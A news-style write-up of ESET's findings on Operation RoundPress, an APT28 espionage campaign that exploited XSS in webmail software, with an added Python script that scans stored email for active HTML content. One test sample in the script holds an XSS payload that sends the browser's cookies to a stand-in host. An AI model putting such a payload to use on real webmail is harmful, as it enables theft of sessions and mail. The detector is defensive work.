# Russia-linked Hackers Target Webmail Servers in Ukraine-Related Espionage Operation
A recent investigation by ESET researchers has uncovered a sophisticated Russia-aligned espionage operation, dubbed RoundPress, which targets webmail users by exploiting cross-site scripting (XSS) vulnerabilities in webmail software. The operation is believed to be carried out by the Sednit group, also known as Fancy Bear or APT28, with the ultimate goal of stealing confidential data from specific email accounts.
## The Operation: Compromise Chain
The RoundPress compromise chain consists of targeted attacks on webmail servers used by individuals and organizations connected to the current war in Ukraine. The targets include Ukrainian governmental entities, defense companies in Bulgaria and Romania, and governments in Africa, the EU, and South America.
According to ESET researcher Matthieu Faou, who discovered and investigated Operation RoundPress, the Sednit group has been using a variety of XSS vulnerabilities to target webmail software, including Horde, MDaemon, and Zimbra. The group has also recently started exploiting a vulnerability in Roundcube (CVE-2023-43770) to gain access to sensitive data.
## The Attack Methodology
The Sednit group delivers these XSS exploits by email. When the target opens the message, malicious JavaScript executes in the context of the webmail client's web page in the victim's browser. Because the script runs inside the victim's authenticated session rather than on the server, it can reach only the data that the victim's own account can reach; that is still everything in the mailbox, and it requires no server-side foothold and no credentials from the attacker.
To execute the exploit successfully, the target must be convinced to open the email message in the vulnerable webmail portal. This means that the email needs to bypass any spam filtering and have a convincing subject line that entices the target into reading the email message.
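The delivery mechanism just described, an HTML message body that carries active content into the webmail renderer, is something a defender can hunt for in stored mail. The script below is an added example, not part of ESET's research or the original article: it parses RFC 5322 messages, decodes every text/html part, and flags markup that a legitimate message has no reason to carry (script tags, inline event handlers, javascript: URIs, embedded SVG/object/iframe elements). The sample messages, addresses and the collector.invalid domain are constructed for the demo. It is a triage heuristic for incident responders, not a sanitizer, does not reproduce any of the specific RoundPress exploits, and does not replace patching the webmail software.

```python
"""Heuristic triage of stored email for XSS-bearing HTML bodies.

Added example, not ESET's or any webmail vendor's code. Scans the decoded
text/html parts of each message, so transfer encodings such as
quoted-printable or base64 cannot hide the markup from the check.
"""
import email
import mailbox
import re
from email import policy
from email.message import EmailMessage

# Markup a webmail client should never have to render from a message body.
# Matched case-insensitively on the decoded HTML. Entity-encoded or otherwise
# obfuscated variants are deliberately out of scope for this triage heuristic.
ACTIVE_CONTENT = [
    ("script-tag", re.compile(r"<\s*script\b", re.I)),
    # an on*= attribute inside a tag, including <img/onerror=...> spellings
    ("event-handler", re.compile(r"<[^>]*[\s/]on[a-z]+\s*=", re.I)),
    ("javascript-uri", re.compile(r"(?:href|src|action)\s*=\s*['\"]?\s*javascript:", re.I)),
    ("svg-or-object", re.compile(r"<\s*(?:svg|object|embed|iframe)\b", re.I)),
    ("data-html-uri", re.compile(r"data:text/html", re.I)),
]


def html_parts(msg: EmailMessage):
    """Yield decoded text/html bodies, including those nested in multipart/alternative."""
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            yield part.get_content()


def scan_message(raw: bytes) -> dict:
    """Return {'subject': ..., 'findings': [labels]} for one raw message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = set()
    for html in html_parts(msg):
        for label, rx in ACTIVE_CONTENT:
            if rx.search(html):
                findings.add(label)
    return {"subject": msg["subject"], "findings": sorted(findings)}


def scan_mbox(path: str) -> list:
    """Triage every message in an mbox file (an exported or spooled mailbox)."""
    return [scan_message(m.as_bytes()) for m in mailbox.mbox(path)]


def build_sample(subject: str, html: str, text: str = "Plain-text alternative.") -> bytes:
    """Constructed test message: multipart/alternative with a text and an HTML part."""
    m = EmailMessage()
    m["From"] = "sender@example.com"   # constructed
    m["To"] = "victim@example.org"     # constructed
    m["Subject"] = subject
    m.set_content(text)
    m.add_alternative(html, subtype="html")
    return m.as_bytes()


# Constructed samples: one benign message and two carrying active content.
SAMPLES = {
    "benign": build_sample(
        "Quarterly report", "<p>Please find the <b>report</b> attached.</p>"),
    "img-handler": build_sample(
        "Invoice",
        '<p>Hi</p><img src="x" onerror="fetch(\'https://collector.invalid/?c=\'+document.cookie)">'),
    "script": build_sample(
        "Update", "<div><script>/* constructed */</script></div>"),
}


def triage(samples: dict) -> dict:
    """Run scan_message over a name -> raw bytes mapping."""
    return {name: scan_message(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, result in triage(SAMPLES).items():
        print(f"{name:12s} subject={result['subject']!r} findings={result['findings']}")
```

Point `scan_mbox` at an exported mailbox to sweep it, then review hits by subject and sender: in this campaign the message that carried the exploit was crafted to look worth opening, so a hit on an unremarkable-looking message is exactly what to pull for full analysis.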
## The Exploits and Payloads
The attackers deploy four JavaScript payloads, one per webmail product: SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA. These payloads are capable of:

* Credential stealing
* Exfiltration of the address book, contacts, and log-in history
* Exfiltration of email messages
Additionally, SpyPress.MDAEMON can bypass two-factor authentication protection by setting up an app password, which lets the attackers read the mailbox from an ordinary mail application without presenting the second factor.
## The Background: The Sednit Group
The Sednit group, also known as APT28, Fancy Bear, Forest Blizzard, or Sofacy, has been operating since at least 2004. The group is believed to be behind several high-profile hacks, including the Democratic National Committee (DNC) hack before the 2016 U.S. elections and the hacking of global television network TV5Monde.
The group is also presumed to be responsible for the World Anti-Doping Agency (WADA) email leak and many other incidents. Webmail servers have been a major target for several espionage groups, including Sednit, GreenCube, and Winter Vivern, which shows how exposed these systems are to remote exploitation through XSS flaws.
## The Importance of Webmail Security
As ESET researcher Matthieu Faou explains, "many organizations don’t keep their webmail servers up to date, and because the vulnerabilities can be triggered remotely by sending an email message, it is very convenient for attackers to target such servers for email theft." This highlights the importance of keeping webmail servers and software up to date with the latest security patches and being cautious when receiving unsolicited emails.